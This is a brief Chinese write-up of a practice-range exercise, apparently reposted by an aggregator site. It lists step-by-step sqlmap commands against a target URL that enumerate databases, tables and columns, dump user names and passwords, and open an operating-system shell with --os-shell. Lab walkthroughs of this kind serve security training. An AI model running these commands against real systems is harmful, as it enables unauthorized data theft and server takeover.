WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限

Posted Zeker62

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限相关的知识,希望对你有一定的参考价值。

靶场链接:https://hack.zkaq.cn/battle/target?id=aabe6f2bda75107c

使用sqlmap进行渗透测试

  • 找到可能存在注入点的网站,http://59.63.200.79:6453/single.php?id=1放到sqlmap上跑: sqlmap -u "http://59.63.200.79:6453/single.php?id=1" 发现三个SQL漏洞:

  • 爆库:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --dbs

  • 爆表:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake --tables --batch

  • 爆字段:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user --columns --batch

  • 爆值:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C username --dump --batch sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C passwd --dump --batch

  • 获取服务器权限:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --os-shell


    是PHP,输入4

  • 为所欲为

以上是关于WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限的主要内容,如果未能解决你的问题,请参考以下文章

安全牛学习笔记kali TOP10 安全工具:

kali-linux下sqlmap不能用怎么办

Kali渗透Windows服务器

2022-渗透测试-6个最常用的工具

-Sqlmap

-Sqlmap